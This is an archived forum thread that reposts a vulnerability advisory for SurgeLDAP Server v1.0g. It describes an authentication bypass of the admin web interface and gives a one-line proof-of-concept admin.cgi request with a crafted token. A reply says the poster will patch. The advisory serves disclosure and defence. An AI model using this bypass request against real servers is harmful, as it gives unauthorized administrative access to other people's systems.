hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

qcred11
QUOTE


Application: SurgeLdap Server
Web Site : http://netwinsite.com/surgeldap/surgeldap.htm
Versions : v1.0g (Build 12)
Platform : Windows
Bug : Bypass the Admin Web Interface authentication


================
1) Introduction
================

SurgeLDAP is the fastest, full-featured ldap server on the market today.

SurgeLDAP is an advanced easy to manage and install high performance LDAP v3 server. It supports any
number of schemas, easy to add/modify
existing schemas, integrated web based user access, and fast browser based administration tools. And
all relevant RFC protocols LDAP
v2, LDAP v3, HTTP.



=======
2) Bug
=======

Bypass the Admin Web Interface authentication


===========
3) The Code
===========


http://127.0.0.1:6680/admin.cgi?cmd=show&p...&utoken=manager

T3cHn0b0y
Thnx for the info m8...had this running on another box of mine, port 6680 blocked though wink.gif

Shall go and patch just incase.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.